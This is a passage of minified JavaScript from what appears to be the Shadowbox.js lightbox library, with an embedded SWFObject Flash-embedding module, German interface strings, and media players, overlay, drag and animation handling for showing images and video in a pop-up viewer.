doc.title=doc.title.slice(0,47)+" - Flash Player Installation";var pt=ua.ie&&ua.win?"ActiveX":"PlugIn",dt=doc.title,fv="MMredirectURL="+win.location+"&MMplayerType="+pt+"&MMdoctitle="+dt,replaceId=regObj.id;if(ua.ie&&ua.win&&obj.readyState!=4){var newObj=createElement("div");replaceId+="SWFObjectNew";newObj.setAttribute("id",replaceId);obj.parentNode.insertBefore(newObj,obj);obj.style.display="none";var fn=function(){obj.parentNode.removeChild(obj);};addListener(win,"onload",fn);}
createSWF({data:regObj.expressInstall,id:EXPRESS_INSTALL_ID,width:regObj.width,height:regObj.height},{flashvars:fv},replaceId);}}
function displayAltContent(obj){if(ua.ie&&ua.win&&obj.readyState!=4){var el=createElement("div");obj.parentNode.insertBefore(el,obj);el.parentNode.replaceChild(abstractAltContent(obj),el);obj.style.display="none";var fn=function(){obj.parentNode.removeChild(obj);};addListener(win,"onload",fn);}
else{obj.parentNode.replaceChild(abstractAltContent(obj),obj);}}
function abstractAltContent(obj){var ac=createElement("div");if(ua.win&&ua.ie){ac.innerHTML=obj.innerHTML;}
else{var nestedObj=obj.getElementsByTagName(OBJECT)[0];if(nestedObj){var c=nestedObj.childNodes;if(c){var cl=c.length;for(var i=0;i<cl;i++){if(!(c[i].nodeType==1&&c[i].nodeName=="PARAM")&&!(c[i].nodeType==8)){ac.appendChild(c[i].cloneNode(true));}}}}}
return ac;}
function createSWF(attObj,parObj,id){var r,el=getElementById(id);if(el){if(typeof attObj.id==UNDEF){attObj.id=id;}
if(ua.ie&&ua.win){var att="";for(var i in attObj){if(attObj[i]!=Object.prototype[i]){if(i.toLowerCase()=="data"){parObj.movie=attObj[i];}
else if(i.toLowerCase()=="styleclass"){att+=' class="'+attObj[i]+'"';}
else if(i.toLowerCase()!="classid"){att+=' '+i+'="'+attObj[i]+'"';}}}
var par="";for(var j in parObj){if(parObj[j]!=Object.prototype[j]){par+='<param name="'+j+'" value="'+parObj[j]+'" />';}}
el.outerHTML='<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"'+att+'>'+par+'</object>';objIdArr[objIdArr.length]=attObj.id;r=getElementById(attObj.id);}
else if(ua.webkit&&ua.webkit<312){var e=createElement("embed");e.setAttribute("type",FLASH_MIME_TYPE);for(var k in attObj){if(attObj[k]!=Object.prototype[k]){if(k.toLowerCase()=="data"){e.setAttribute("src",attObj[k]);}
else if(k.toLowerCase()=="styleclass"){e.setAttribute("class",attObj[k]);}
else if(k.toLowerCase()!="classid"){e.setAttribute(k,attObj[k]);}}}
for(var l in parObj){if(parObj[l]!=Object.prototype[l]){if(l.toLowerCase()!="movie"){e.setAttribute(l,parObj[l]);}}}
el.parentNode.replaceChild(e,el);r=e;}
else{var o=createElement(OBJECT);o.setAttribute("type",FLASH_MIME_TYPE);for(var m in attObj){if(attObj[m]!=Object.prototype[m]){if(m.toLowerCase()=="styleclass"){o.setAttribute("class",attObj[m]);}
else if(m.toLowerCase()!="classid"){o.setAttribute(m,attObj[m]);}}}
for(var n in parObj){if(parObj[n]!=Object.prototype[n]&&n.toLowerCase()!="movie"){createObjParam(o,n,parObj[n]);}}
el.parentNode.replaceChild(o,el);r=o;}}
return r;}
function createObjParam(el,pName,pValue){var p=createElement("param");p.setAttribute("name",pName);p.setAttribute("value",pValue);el.appendChild(p);}
function removeSWF(id){var obj=getElementById(id);if(obj&&(obj.nodeName=="OBJECT"||obj.nodeName=="EMBED")){if(ua.ie&&ua.win){if(obj.readyState==4){removeObjectInIE(id);}
else{win.attachEvent("onload",function(){removeObjectInIE(id);});}}
else{obj.parentNode.removeChild(obj);}}}
function removeObjectInIE(id){var obj=getElementById(id);if(obj){for(var i in obj){if(typeof obj[i]=="function"){obj[i]=null;}}
obj.parentNode.removeChild(obj);}}
function getElementById(id){var el=null;try{el=doc.getElementById(id);}
catch(e){}
return el;}
function createElement(el){return doc.createElement(el);}
function addListener(target,eventType,fn){target.attachEvent(eventType,fn);listenersArr[listenersArr.length]=[target,eventType,fn];}
function hasPlayerVersion(rv){var pv=ua.pv,v=rv.split(".");v[0]=parseInt(v[0],10);v[1]=parseInt(v[1],10)||0;v[2]=parseInt(v[2],10)||0;return(pv[0]>v[0]||(pv[0]==v[0]&&pv[1]>v[1])||(pv[0]==v[0]&&pv[1]==v[1]&&pv[2]>=v[2]))?true:false;}
function createCSS(sel,decl){if(ua.ie&&ua.mac){return;}
var h=doc.getElementsByTagName("head")[0],s=createElement("style");s.setAttribute("type","text/css");s.setAttribute("media","screen");if(!(ua.ie&&ua.win)&&typeof doc.createTextNode!=UNDEF){s.appendChild(doc.createTextNode(sel+" {"+decl+"}"));}
h.appendChild(s);if(ua.ie&&ua.win&&typeof doc.styleSheets!=UNDEF&&doc.styleSheets.length>0){var ls=doc.styleSheets[doc.styleSheets.length-1];if(typeof ls.addRule==OBJECT){ls.addRule(sel,decl);}}}
function setVisibility(id,isVisible){var v=isVisible?"visible":"hidden";if(isDomLoaded&&getElementById(id)){getElementById(id).style.visibility=v;}
else{createCSS("#"+id,"visibility:"+v);}}
function urlEncodeIfNecessary(s){var regex=/[\\\"<>\.;]/;var hasBadChars=regex.exec(s)!=null;return hasBadChars?encodeURIComponent(s):s;}
var cleanup=function(){if(ua.ie&&ua.win){window.attachEvent("onunload",function(){var ll=listenersArr.length;for(var i=0;i<ll;i++){listenersArr[i][0].detachEvent(listenersArr[i][1],listenersArr[i][2]);}
var il=objIdArr.length;for(var j=0;j<il;j++){removeSWF(objIdArr[j]);}
for(var k in ua){ua[k]=null;}
ua=null;for(var l in swfobject){swfobject[l]=null;}
swfobject=null;});}}();return{registerObject:function(objectIdStr,swfVersionStr,xiSwfUrlStr){if(!ua.w3cdom||!objectIdStr||!swfVersionStr){return;}
var regObj={};regObj.id=objectIdStr;regObj.swfVersion=swfVersionStr;regObj.expressInstall=xiSwfUrlStr?xiSwfUrlStr:false;regObjArr[regObjArr.length]=regObj;setVisibility(objectIdStr,false);},getObjectById:function(objectIdStr){var r=null;if(ua.w3cdom){var o=getElementById(objectIdStr);if(o){var n=o.getElementsByTagName(OBJECT)[0];if(!n||(n&&typeof o.SetVariable!=UNDEF)){r=o;}
else if(typeof n.SetVariable!=UNDEF){r=n;}}}
return r;},embedSWF:function(swfUrlStr,replaceElemIdStr,widthStr,heightStr,swfVersionStr,xiSwfUrlStr,flashvarsObj,parObj,attObj){if(!ua.w3cdom||!swfUrlStr||!replaceElemIdStr||!widthStr||!heightStr||!swfVersionStr){return;}
widthStr+="";heightStr+="";if(hasPlayerVersion(swfVersionStr)){setVisibility(replaceElemIdStr,false);var att={};if(attObj&&typeof attObj===OBJECT){for(var i in attObj){if(attObj[i]!=Object.prototype[i]){att[i]=attObj[i];}}}
att.data=swfUrlStr;att.width=widthStr;att.height=heightStr;var par={};if(parObj&&typeof parObj===OBJECT){for(var j in parObj){if(parObj[j]!=Object.prototype[j]){par[j]=parObj[j];}}}
if(flashvarsObj&&typeof flashvarsObj===OBJECT){for(var k in flashvarsObj){if(flashvarsObj[k]!=Object.prototype[k]){if(typeof par.flashvars!=UNDEF){par.flashvars+="&"+k+"="+flashvarsObj[k];}
else{par.flashvars=k+"="+flashvarsObj[k];}}}}
addDomLoadEvent(function(){createSWF(att,par,replaceElemIdStr);if(att.id==replaceElemIdStr){setVisibility(replaceElemIdStr,true);}});}
else if(xiSwfUrlStr&&!isExpressInstallActive&&hasPlayerVersion("6.0.65")&&(ua.win||ua.mac)){isExpressInstallActive=true;setVisibility(replaceElemIdStr,false);addDomLoadEvent(function(){var regObj={};regObj.id=regObj.altContentId=replaceElemIdStr;regObj.width=widthStr;regObj.height=heightStr;regObj.expressInstall=xiSwfUrlStr;showExpressInstall(regObj);});}},getFlashPlayerVersion:function(){return{major:ua.pv[0],minor:ua.pv[1],release:ua.pv[2]};},hasFlashPlayerVersion:hasPlayerVersion,createSWF:function(attObj,parObj,replaceElemIdStr){if(ua.w3cdom){return createSWF(attObj,parObj,replaceElemIdStr);}
else{return undefined;}},removeSWF:function(objElemIdStr){if(ua.w3cdom){removeSWF(objElemIdStr);}},createCSS:function(sel,decl){if(ua.w3cdom){createCSS(sel,decl);}},addDomLoadEvent:addDomLoadEvent,addLoadEvent:addLoadEvent,getQueryParamValue:function(param){var q=doc.location.search||doc.location.hash;if(param==null){return urlEncodeIfNecessary(q);}
if(q){var pairs=q.substring(1).split("&");for(var i=0;i<pairs.length;i++){if(pairs[i].substring(0,pairs[i].indexOf("="))==param){return urlEncodeIfNecessary(pairs[i].substring((pairs[i].indexOf("=")+1)));}}}
return"";},expressInstallCallback:function(){if(isExpressInstallActive&&storedAltContent){var obj=getElementById(EXPRESS_INSTALL_ID);if(obj){obj.parentNode.replaceChild(storedAltContent,obj);if(storedAltContentId){setVisibility(storedAltContentId,true);if(ua.ie&&ua.win){storedAltContent.style.display="block";}}
storedAltContent=null;storedAltContentId=null;isExpressInstallActive=false;}}}};}();return swfobject;})();S.lang={code:'de',of:'von',loading:'ladend',cancel:'Abbrechen',next:'Nächste',previous:'Vorige',play:'Abspielen',pause:'Pause',close:'Schließen',errors:{single:'Um den Inhalt anzeigen zu können muss die Browser-Erweiterung <a href="{0}">{1}</a> installiert werden.',shared:'Um den Inhalt anzeigen zu können müssen die beiden Browser-Erweiterungen <a href="{0}">{1}</a> und <a href="{2}">{3}</a> installiert werden.',either:'Um den Inhalt anzeigen zu können muss eine der beiden Browser-Erweiterungen <a href="{0}">{1}</a> oder <a href="{2}">{3}</a> installiert werden.'}};var jwControllerHeight=20;S.flv=function(obj,id){this.obj=obj;this.id=id;this.height=obj.height?parseInt(obj.height,10):300;if(S.options.showMovieControls)
this.height+=jwControllerHeight;this.width=obj.width?parseInt(obj.width,10):300;}
S.flv.ext=["flv","m4v"];S.flv.prototype={append:function(body,dims){var tmp=document.createElement('div');tmp.id=this.id;body.appendChild(tmp);var height=dims.innerHeight,width=dims.innerWidth,swf=S.path+"player.swf",version=S.options.flashVersion,express=S.path+"expressInstall.swf",flashvars=apply({file:this.obj.content,height:height,width:width,autostart:(S.options.autoplayMovies?"true":"false"),controlbar:(S.options.showMovieControls?"bottom":"none"),backcolor:"0x000000",frontcolor:"0xCCCCCC",lightcolor:"0x557722"},S.options.flashVars),params=S.options.flashParams;S.flash.embedSWF(swf,this.id,width,height,version,express,flashvars,params);},remove:function(){S.flash.expressInstallCallback();S.flash.removeSWF(this.id);},onWindowResize:function(){var dims=S.dimensions,el=get(this.id);el.height=dims.innerHeight;el.width=dims.innerWidth;}}
S.html=function(obj,id){this.obj=obj;this.id=id;this.height=obj.height?parseInt(obj.height,10):300;this.width=obj.width?parseInt(obj.width,10):500;}
S.html.prototype={append:function(body,dims){var div=document.createElement("div");div.id=this.id;div.className="html";div.innerHTML=this.obj.content;body.appendChild(div);},remove:function(){var el=get(this.id);if(el)
remove(el);}}
S.iframe=function(obj,id){this.obj=obj;this.id=id;var overlay=get("sb-overlay");this.height=obj.height?parseInt(obj.height,10):overlay.offsetHeight;this.width=obj.width?parseInt(obj.width,10):overlay.offsetWidth;}
S.iframe.prototype={append:function(body,dims){var scrolling='';if(this.obj.iframeScrolling==='dynamic_noScrollFallback'&&(S.isIE6||S.isIE7)){scrolling='no';}else if(this.obj.iframeScrolling!=='no'&&this.obj.iframeScrolling!=='yes'){scrolling='auto';}else{scrolling=this.obj.iframeScrolling;}
var html='<iframe id="'+this.id+'" name="'+this.id+'" height="100%" '+'width="100%" frameborder="0" marginwidth="0" marginheight="0" '+'style="visibility:hidden;" '+'onload="this.style.visibility=\'visible\'" '+'scrolling="'+scrolling+'"';if(S.isIE){html+=' allowtransparency="true"';if(S.isIE6)
html+=' src="javascript:false;document.write(\'\');"';}
html+='></iframe>';body.innerHTML=html;},remove:function(){var el=get(this.id);if(el){remove(el);if(S.isGecko)
delete window.frames[this.id];}},onLoad:function(){var win=S.isIE?get(this.id).contentWindow:window.frames[this.id];win.location.href=this.obj.content;var iframeInstance=this;window.setTimeout(function(){iframeInstance.triggerResize(iframeInstance)},100);window.setTimeout(function(){iframeInstance.triggerResize(iframeInstance)},500);window.setTimeout(function(){iframeInstance.triggerResize(iframeInstance)},1000);},triggerResize:function(iframeInstance){if(typeof iframeInstance!=='object'){iframeInstance=this;}
var win=window.frames[iframeInstance.id];if(typeof win!=='undefined'){if(win.document.body===null){window.setTimeout(function(){iframeInstance.triggerResize(iframeInstance)},10);}else{var dims=setDimensions(iframeInstance.height,iframeInstance.width);iframeInstance.onWindowResize(dims);}}},onWindowResize:function(dims){if(this.obj.iframeScrolling!=='dynamic'&&this.obj.iframeScrolling!=='dynamic_noScrollFallback'){return;}
var element=document.getElementById(this.id);var win=S.isIE?get(this.id).contentWindow:window.frames[this.id];if(dims.oversized){element.style.overflow='auto';if(this.obj.width<=dims.width){element.style.overflowX='hidden';}else if(this.obj.height<=dims.height){element.style.overflowY='hidden';}
win.document.body.style.overflow='auto';}else{element.style.overflow='hidden';win.document.body.style.overflow='hidden';}}}
var pre,proxyId="sb-drag-proxy",dragData,dragProxy,dragTarget;function resetDrag(){dragData={x:0,y:0,startX:null,startY:null};}
function updateProxy(){var dims=S.dimensions;apply(dragProxy.style,{height:dims.innerHeight+"px",width:dims.innerWidth+"px"});}
function enableDrag(){resetDrag();var style=["position:absolute","cursor:"+(S.isGecko?"-moz-grab":"move"),"background-color:"+(S.isIE?"#fff;filter:alpha(opacity=0)":"transparent")].join(";");S.appendHTML(S.skin.body,'<div id="'+proxyId+'" style="'+style+'"></div>');dragProxy=get(proxyId);updateProxy();addEvent(dragProxy,"mousedown",startDrag);}
function disableDrag(){if(dragProxy){removeEvent(dragProxy,"mousedown",startDrag);remove(dragProxy);dragProxy=null;}
dragTarget=null;}
function startDrag(e){preventDefault(e);var xy=getPageXY(e);dragData.startX=xy[0];dragData.startY=xy[1];dragTarget=get(S.player.id);addEvent(document,"mousemove",positionDrag);addEvent(document,"mouseup",endDrag);if(S.isGecko)
dragProxy.style.cursor="-moz-grabbing";}
function positionDrag(e){var player=S.player,dims=S.dimensions,xy=getPageXY(e);var moveX=xy[0]-dragData.startX;dragData.startX+=moveX;dragData.x=Math.max(Math.min(0,dragData.x+moveX),dims.innerWidth-player.width);var moveY=xy[1]-dragData.startY;dragData.startY+=moveY;dragData.y=Math.max(Math.min(0,dragData.y+moveY),dims.innerHeight-player.height);apply(dragTarget.style,{left:dragData.x+"px",top:dragData.y+"px"});}
function endDrag(){removeEvent(document,"mousemove",positionDrag);removeEvent(document,"mouseup",endDrag);if(S.isGecko)
dragProxy.style.cursor="-moz-grab";}
S.img=function(obj,id){this.obj=obj;this.id=id;this.ready=false;var self=this;pre=new Image();pre.onload=function(){self.height=obj.height?parseInt(obj.height,10):pre.height;self.width=obj.width?parseInt(obj.width,10):pre.width;self.ready=true;pre.onload=null;pre=null;}
pre.src=obj.content;}
S.img.ext=["bmp","gif","jpg","jpeg","png"];S.img.prototype={append:function(body,dims){var img=document.createElement("img");img.id=this.id;img.src=this.obj.content;img.style.position="absolute";var height,width;if(dims.oversized&&S.options.handleOversize=="resize"){height=dims.innerHeight;width=dims.innerWidth;}else{height=this.height;width=this.width;}
img.setAttribute("height",height);img.setAttribute("width",width);body.appendChild(img);},remove:function(){var el=get(this.id);if(el)
remove(el);disableDrag();if(pre){pre.onload=null;pre=null;}},onLoad:function(){var dims=S.dimensions;if(dims.oversized&&S.options.handleOversize=="drag")
enableDrag();},onWindowResize:function(){var dims=S.dimensions;switch(S.options.handleOversize){case"resize":var el=get(this.id);el.height=dims.innerHeight;el.width=dims.innerWidth;break;case"drag":if(dragTarget){var top=parseInt(S.getStyle(dragTarget,"top")),left=parseInt(S.getStyle(dragTarget,"left"));if(top+this.height<dims.innerHeight)
dragTarget.style.top=dims.innerHeight-this.height+"px";if(left+this.width<dims.innerWidth)
dragTarget.style.left=dims.innerWidth-this.width+"px";updateProxy();}
break;}}}
var qtControllerHeight=16;S.qt=function(obj,id){this.obj=obj;this.id=id;this.height=obj.height?parseInt(obj.height,10):300;if(S.options.showMovieControls)
this.height+=qtControllerHeight;this.width=obj.width?parseInt(obj.width,10):300;}
S.qt.ext=["dv","mov","moov","movie","mp4","avi","mpg","mpeg"];S.qt.prototype={append:function(body,dims){var opt=S.options,autoplay=String(opt.autoplayMovies),controls=String(opt.showMovieControls);var html="<object",movie={id:this.id,name:this.id,height:this.height,width:this.width,kioskmode:"true"};if(S.isIE){movie.classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B";movie.codebase="http://www.apple.com/qtactivex/qtplugin.cab#version=6,0,2,0";}else{movie.type="video/quicktime";movie.data=this.obj.content;}
for(var m in movie)
html+=" "+m+'="'+movie[m]+'"';html+=">";var params={src:this.obj.content,scale:"aspect",controller:controls,autoplay:autoplay};for(var p in params)
html+='<param name="'+p+'" value="'+params[p]+'">';html+="</object>";body.innerHTML=html;},remove:function(){try{document[this.id].Stop();}catch(e){}
var el=get(this.id);if(el)
remove(el);}}
S.swf=function(obj,id){this.obj=obj;this.id=id;this.height=obj.height?parseInt(obj.height,10):300;this.width=obj.width?parseInt(obj.width,10):300;}
S.swf.ext=["swf"];S.swf.prototype={append:function(body,dims){var tmp=document.createElement("div");tmp.id=this.id;body.appendChild(tmp);var height=dims.innerHeight,width=dims.innerWidth,swf=this.obj.content,version=S.options.flashVersion,express=S.path+"expressInstall.swf",flashvars=S.options.flashVars,params=S.options.flashParams;S.flash.embedSWF(swf,this.id,width,height,version,express,flashvars,params);},remove:function(){S.flash.expressInstallCallback();S.flash.removeSWF(this.id);},onWindowResize:function(){var dims=S.dimensions,el=get(this.id);el.height=dims.innerHeight;el.width=dims.innerWidth;}}
var wmpControllerHeight=(S.isIE?70:45);S.wmp=function(obj,id){this.obj=obj;this.id=id;this.height=obj.height?parseInt(obj.height,10):300;if(S.options.showMovieControls)
this.height+=wmpControllerHeight;this.width=obj.width?parseInt(obj.width,10):300;}
S.wmp.ext=["asf","avi","mpg","mpeg","wm","wmv"];S.wmp.prototype={append:function(body,dims){var opt=S.options,autoplay=opt.autoplayMovies?1:0;var movie='<object id="'+this.id+'" name="'+this.id+'" height="'+this.height+'" width="'+this.width+'"',params={autostart:opt.autoplayMovies?1:0};if(S.isIE){movie+=' classid="clsid:6BF52A52-394A-11d3-B153-00C04F79FAA6"';params.url=this.obj.content;params.uimode=opt.showMovieControls?"full":"none";}else{movie+=' type="video/x-ms-wmv"';movie+=' data="'+this.obj.content+'"'
params.showcontrols=opt.showMovieControls?1:0;}
movie+=">";for(var p in params)
movie+='<param name="'+p+'" value="'+params[p]+'">';movie+="</object>";body.innerHTML=movie;},remove:function(){if(S.isIE){try{window[this.id].controls.stop();window[this.id].URL="movie"+now()+".wmv";window[this.id]=function(){};}catch(e){}}
var el=get(this.id);if(el){setTimeout(function(){remove(el);},10);}}}
var overlayOn=false,visibilityCache=[],pngIds=["sb-nav-close","sb-nav-next","sb-nav-play","sb-nav-pause","sb-nav-previous"],container,overlay,wrapper,doWindowResize=true;function animate(el,property,to,duration,callback){var isOpacity=(property=="opacity"),anim=isOpacity?S.setOpacity:function(el,value){el.style[property]=""+
value+"px";};if(duration==0||(!isOpacity&&!S.options.animate)||(isOpacity&&!S.options.animateFade)){anim(el,to);if(callback)
callback();return;}
var from=parseFloat(S.getStyle(el,property))||0;var delta=to-from;if(delta==0){if(callback)
callback();return;}
duration*=1000;var begin=now(),ease=S.ease,end=begin+duration,time;var interval=setInterval(function(){time=now();if(time>=end){clearInterval(interval);interval=null;anim(el,to);if(callback)
callback();}else{anim(el,from+ease((time-begin)/duration)*delta);}},10);}
function setSize(){container.style.height=S.getWindowSize("Height")+"px";container.style.width=S.getWindowSize("Width")+"px";}
function setPosition(){container.style.top=document.documentElement.scrollTop+"px";container.style.left=document.documentElement.scrollLeft+"px";}
function toggleTroubleElements(on){if(on){each(visibilityCache,function(i,el){el[0].style.visibility=el[1]||'';});}else{visibilityCache=[];each(S.options.troubleElements,function(i,tag){each(document.getElementsByTagName(tag),function(j,el){visibilityCache.push([el,el.style.visibility]);el.style.visibility="hidden";});});}}
function toggleNav(id,on){var el=get("sb-nav-"+id);if(el)
el.style.display=on?"":"none";}
function toggleLoading(on,callback){var loading=get("sb-loading"),playerName=S.getCurrent().player,anim=(playerName=="img"||playerName=="html");if(on){S.setOpacity(loading,0);loading.style.display="block";var wrapped=function(){S.clearOpacity(loading);if(callback)
callback();}
if(anim){animate(loading,"opacity",1,S.options.fadeDuration,wrapped);}else{wrapped();}}else{var wrapped=function(){loading.style.display="none";S.clearOpacity(loading);if(callback)
callback();}
if(anim){animate(loading,"opacity",0,S.options.fadeDuration,wrapped);}else{wrapped();}}}
function buildBars(callback){var obj=S.getCurrent();get("sb-title-inner").innerHTML=obj.title||"";var close,next,play,pause,previous;if(S.options.displayNav){close=true;var len=S.gallery.length;if(len>1){if(S.options.continuous){next=previous=true;}else{next=(len-1)>S.current;previous=S.current>0;}}
if(S.options.slideshowDelay>0&&S.hasNext()){pause=!S.isPaused();play=!pause;}}else{close=next=play=pause=previous=false;}
toggleNav("close",close);toggleNav("next",next);toggleNav("play",play);toggleNav("pause",pause);toggleNav("previous",previous);var counter="";if(S.options.displayCounter&&S.gallery.length>1){var len=S.gallery.length;if(S.options.counterType=="skip"){var i=0,end=len,limit=parseInt(S.options.counterLimit)||0;if(limit<len&&limit>2){var h=Math.floor(limit/2);i=S.current-h;if(i<0)
i+=len;end=S.current+(limit-h);if(end>len)
end-=len;}
while(i!=end){if(i==len)
i=0;counter+='<a onclick="Shadowbox.change('+i+');"'
if(i==S.current)
counter+=' class="sb-counter-current"';counter+=">"+(++i)+"</a>";}}else{counter=[S.current+1,S.lang.of,len].join(' ');}}
get("sb-counter").innerHTML=counter;callback();}
function showBars(callback){var titleInner=get("sb-title-inner"),infoInner=get("sb-info-inner"),duration=0.35;titleInner.style.visibility=infoInner.style.visibility="";if(titleInner.innerHTML!="")
animate(titleInner,"marginTop",0,duration);animate(infoInner,"marginTop",0,duration,callback);}
function hideBars(anim,callback){var title=get("sb-title"),info=get("sb-info"),titleHeight=title.offsetHeight,infoHeight=info.offsetHeight,titleInner=get("sb-title-inner"),infoInner=get("sb-info-inner"),duration=(anim?0.35:0);animate(titleInner,"marginTop",titleHeight,duration);animate(infoInner,"marginTop",infoHeight*-1,duration,function(){titleInner.style.visibility=infoInner.style.visibility="hidden";callback();});}
function adjustHeight(height,top,anim,callback){var wrapperInner=get("sb-wrapper-inner"),duration=(anim?S.options.resizeDuration:0);animate(wrapper,"top",top,duration);animate(wrapperInner,"height",height,duration,callback);}
function adjustWidth(width,left,anim,callback){var duration=(anim?S.options.resizeDuration:0);animate(wrapper,"left",left,duration);animate(wrapper,"width",width,duration,callback);}
function setDimensions(height,width){var bodyInner=get("sb-body-inner"),height=parseInt(height),width=parseInt(width),topBottom=wrapper.offsetHeight-bodyInner.offsetHeight,leftRight=wrapper.offsetWidth-bodyInner.offsetWidth,maxHeight=overlay.offsetHeight,maxWidth=overlay.offsetWidth,padding=parseInt(S.options.viewportPadding)||20,preserveAspect=(S.options.preserveAspectWhileResizing&&S.player&&S.options.handleOversize!="drag");return S.setDimensions(height,width,maxHeight,maxWidth,topBottom,leftRight,padding,preserveAspect);}
var K={};K.markup=""+'<div id="sb-container">'+'<div id="sb-overlay"></div>'+'<div id="sb-wrapper">'+'<div id="sb-title">'+'<div id="sb-title-inner"></div>'+'</div>'+'<div id="sb-wrapper-inner">'+'<div id="sb-body">'+'<div id="sb-body-inner"></div>'+'<div id="sb-loading">'+'<div id="sb-loading-inner"><span>{loading}</span></div>'+'</div>'+'</div>'+'</div>'+'<div id="sb-info">'+'<div id="sb-info-inner">'+'<div id="sb-counter"></div>'+'<div id="sb-nav">'+'<a id="sb-nav-close" title="{close}" onclick="Shadowbox.close()"></a>'+'<a id="sb-nav-next" title="{next}" onclick="Shadowbox.next()"></a>'+'<a id="sb-nav-play" title="{play}" onclick="Shadowbox.play()"></a>'+'<a id="sb-nav-pause" title="{pause}" onclick="Shadowbox.pause()"></a>'+'<a id="sb-nav-previous" title="{previous}" onclick="Shadowbox.previous()"></a>'+'</div>'+'</div>'+'</div>'+'</div>'+'</div>';K.options={animSequence:"sync",counterLimit:10,counterType:"default",displayCounter:true,displayNav:true,fadeDuration:0.35,initialHeight:160,initialWidth:320,modal:false,overlayColor:"#000",overlayOpacity:0.5,resizeDuration:0.35,showOverlay:true,troubleElements:["select","object","embed","canvas"]};K.init=function(){S.appendHTML(document.body,sprintf(K.markup,S.lang));K.body=get("sb-body-inner");container=get("sb-container");overlay=get("sb-overlay");wrapper=get("sb-wrapper");if(!supportsFixed)
container.style.position="absolute";if(!supportsOpacity){var el,m,re=/url\("(.*\.png)"\)/;each(pngIds,function(i,id){el=get(id);if(el){m=S.getStyle(el,"backgroundImage").match(re);if(m){el.style.backgroundImage="none";el.style.filter="progid:DXImageTransform.Microsoft.AlphaImageLoader(enabled=true,src="+
m[1]+",sizingMethod=scale);";}}});}
var timer;addEvent(window,"resize",function(){if(timer){clearTimeout(timer);timer=null;}
if(open)
timer=setTimeout(K.onWindowResize,10);});}
K.onOpen=function(obj,callback){doWindowResize=false;container.style.display="block";setSize();var dims=setDimensions(S.options.initialHeight,S.options.initialWidth);adjustHeight(dims.innerHeight,dims.top);adjustWidth(dims.width,dims.left);if(S.options.showOverlay){overlay.style.backgroundColor=S.options.overlayColor;S.setOpacity(overlay,0);if(!S.options.modal)
addEvent(overlay,"click",S.close);overlayOn=true;}
if(!supportsFixed){setPosition();addEvent(window,"scroll",setPosition);}
toggleTroubleElements();container.style.visibility="visible";if(overlayOn){animate(overlay,"opacity",S.options.overlayOpacity,S.options.fadeDuration,callback);}else{callback();}}
K.onLoad=function(changing,callback){toggleLoading(true);while(K.body.firstChild)
remove(K.body.firstChild);hideBars(changing,function(){if(!open)
return;if(!changing)
wrapper.style.visibility="visible";buildBars(callback);});}
K.onReady=function(callback){if(!open)
return;var player=S.player,dims=setDimensions(player.height,player.width);var wrapped=function(){showBars(callback);}
switch(S.options.animSequence){case"hw":adjustHeight(dims.innerHeight,dims.top,true,function(){adjustWidth(dims.width,dims.left,true,wrapped);});break;case"wh":adjustWidth(dims.width,dims.left,true,function(){adjustHeight(dims.innerHeight,dims.top,true,wrapped);});break;default:adjustWidth(dims.width,dims.left,true);adjustHeight(dims.innerHeight,dims.top,true,wrapped);}}
K.onShow=function(callback){toggleLoading(false,callback);doWindowResize=true;}
K.onClose=function(){if(!supportsFixed)
removeEvent(window,"scroll",setPosition);removeEvent(overlay,"click",S.close);wrapper.style.visibility="hidden";var callback=function(){container.style.visibility="hidden";container.style.display="none";toggleTroubleElements(true);}
if(overlayOn){animate(overlay,"opacity",0,S.options.fadeDuration,callback);}else{callback();}}
K.onPlay=function(){toggleNav("play",false);toggleNav("pause",true);}
K.onPause=function(){toggleNav("pause",false);toggleNav("play",true);}
K.onWindowResize=function(){if(!doWindowResize)
return;setSize();var player=S.player,dims=setDimensions(player.height,player.width);adjustWidth(dims.width,dims.left);adjustHeight(dims.innerHeight,dims.top);if(player.onWindowResize)
player.onWindowResize(dims);}
S.skin=K;window['Shadowbox']=S;})(window);;

